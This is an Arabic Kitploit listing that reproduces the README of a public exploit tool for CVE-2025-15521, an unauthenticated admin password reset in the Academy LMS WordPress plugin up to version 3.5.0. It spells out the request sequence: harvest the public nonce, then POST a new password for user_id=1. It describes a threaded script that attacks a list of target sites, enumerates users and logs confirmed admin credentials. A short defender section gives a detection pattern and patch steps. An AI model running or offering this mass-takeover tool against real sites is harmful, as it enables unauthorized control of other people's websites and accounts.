Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-15521 — إضافة Academy LMS – WordPress LMS Plugin for Complete eLearning Solution الخاصة بووردبريس معرّضة لثغرة تصعيد الامتيازات عبر الاستيلاء على الحساب في جميع الإصدارات حتى الإصدار 3.5.0 وما يشمل ذلك الإصدار. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-15521
الاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالمصادقة
GitHubnxploited/cve-2025-15521

CVE-2025-15521

إضافة Academy LMS – WordPress LMS Plugin for Complete eLearning Solution الخاصة بووردبريس معرّضة لثغرة تصعيد الامتيازات عبر الاستيلاء على الحساب في جميع الإصدارات حتى الإصدار 3.5.0 وما يشمل ذلك الإصدار.

عرض المستودع
11منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-15521

إضافة Academy LMS – WordPress LMS Plugin for Complete eLearning Solution في ووردبريس معرّضة لتصعيد الامتيازات عبر الاستيلاء على الحسابات في جميع الإصدارات حتى 3.5.0 وما يشملها.

root@kitploit:~
 _____ _____ _____     ___ ___ ___ ___     ___   ___ ___ ___ ___  
|     |  |  |   __|___|_  |   |_  |  _|___|_  | |  _|  _|_  |_  | 
|   --|  |  |   __|___|  _| | |  _|_  |___|_| |_|_  |_  |  _|_| |_
|_____|\___/|_____|   |___|___|___|___|   |_____|___|___|___|_____|

Telegram CVE CVSS Python

📡 تابع @KNxploited — إفصاحات CVE واستغلالات جاهزة، دون تأخير.


ما هذا؟

CVE-2025-15521 — استيلاء غير مصادق على الحساب عبر إعادة تعيين كلمة المرور في Academy LMS ≤ 3.5.0.

يُصادق معالج إعادة التعيين في الإضافة على الطلب باستخدام nonce مكشوف للعموم (academy_nonce) مضمّن في صفحات الدورات فقط. لا يتم إرسال أي رمز إلى بريد المستخدم الإلكتروني. لا يوجد فحص للجلسة. لا يوجد تحقق من الهوية. أي مهاجم يقرأ أي صفحة دورة يحصل على nonce صالح، ثم يعيد تعيين كلمة مرور أي حساب عبر توفير user_id — بما في ذلك user_id=1 (مدير الموقع).

CVSS 3.1: 9.8 حرجة — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNA: Wordfence


كيف تعمل الثغرة؟

root@kitploit:~
GET /course/any-course/
  → HTML contains: "academy_nonce": "a1b2c3d4e5"   ← public, no auth

POST /academy-retrieve-password/?user_id=1
  new_password=<anything>
  confirm_new_password=<anything>
  security=a1b2c3d4e5                               ← nonce accepted

  → Password for user_id=1 changed. No email. No confirmation.

يستدعي المعالج الدالة wp_set_password() بعد التحقق فقط من wp_verify_nonce() على nonce يُبث إلى كل زائر. لا يوجد أي تحقق من أن المستخدم مُرسل الطلب يملك الحساب الذي يتم تعديله.


ماذا يفعل هذا السكربت؟

  1. يزحف إلى صفحات الدورات لاستخراج academy_nonce حي
  2. يطلق معالج إعادة التعيين لـ user_id مستهدف بكلمة مرور مختارة
  3. يعدّد أسماء المستخدمين عبر عمليات إعادة توجيه /?author=N وواجهة REST API (/wp-json/wp/v2/users)
  4. يحاول تسجيل دخول صارمًا لكل مرشح:
    • يرفض رسائل الفشل المعروفة
    • يتطلب وجود cookie باسم wordpress_logged_in
    • يتطلب وجود مؤشرات حقيقية لواجهة إدارة المشرف في /wp-admin — وليس مجرد استجابة 200
  5. يكتب إدخالات الوصول المؤكدة إلى ملف مخرجات — ولا تتم طباعة أي بيانات حساسة في الطرفية

المتطلبات

root@kitploit:~
pip install requests colorama urllib3

يتطلب Python 3.8+. يُنصح بـ Python 3.10+.


الاستخدام

root@kitploit:~
python CVE-2025-15521.py

سيُطلب منك ما يلي:

root@kitploit:~
Targets list file (one URL per line): list.txt
Threads (concurrent sites) [5]: 10
Reset handler path [/academy-retrieve-password/]:
Course root path (key source) [/course/]:
Max /course/ subpages to scan per site [15]:
user_id to reset (handler target) [1]:
New password to set [adminSA]:
HTTP timeout (seconds) [10]:
Output file [scan_results/academy_access_success.txt]:

ملف الأهداف — رابط في كل سطر، البروتوكول اختياري:

root@kitploit:~
https://target1.com
target2.com
https://target3.com/lms

المخرجات

الطرفية — سطر واحد لكل هدف، دون طباعة بيانات الاعتماد:

root@kitploit:~
[14:02:11] [https://target.com] KEY: OK   | RESET: OK   | ACCESS: 1 HIT
[14:02:13] [https://target2.com] KEY: FAIL | RESET: -    | ACCESS: 0 HIT

الملف — إدخالات الوصول المؤكدة فقط:

root@kitploit:~
[2025-04-18T14:02:11] https://target.com - account=admin  pass=adminSA

الاكتشاف والمعالجة

للمدافعين:

احجب أو راقب طلبات POST غير المصادقة الموجهة إلى نقطة نهاية إعادة التعيين:

root@kitploit:~
POST *academy-retrieve-password* with parameter: security=

افحص مدى تعرّض rm_admin_order / academy_nonce في مصدر صفحة الدورة الخاص بقالبك. إذا كان الـ nonce ظاهرًا دون تسجيل الدخول — فإن إصدارك متأثر.

خطوات الإصلاح الفورية:

  • حدّث Academy LMS إلى إصدار أحدث من 3.5.0
  • عطّل الإضافة مؤقتًا إذا لم يتوفر تصحيح
  • راجع كلمات مرور المشرف التي تغيّرت مؤخرًا
  • فرض إعادة تعيين كلمة المرور على جميع حسابات المشرف
  • طبّق التحقق من الرمز عبر البريد الإلكتروني لأي عملية إعادة تعيين كلمة مرور

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض البحث الأمني واختبار الاختراق المصرح به فقط.
شغّلها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
لا يتحمل المؤلف أي مسؤولية عن الاستخدام غير المصرح به أو غير القانوني.
الاستخدام غير المصرح به ينتهك CFAA وCMA والتوجيه الأوروبي 2013/40/EU وقانون مكافحة الجرائم الإلكترونية السعودي رقم M/17 والقوانين المماثلة حول العالم.


بواسطة Nxploited (Khaled Alenazi)
t.me/KNxploited · github.com/Nxploited

🔔 تابع @KNxploited على تيليغرام لآخر إفصاحات واستغلالات CVE.

تنزيل الأداة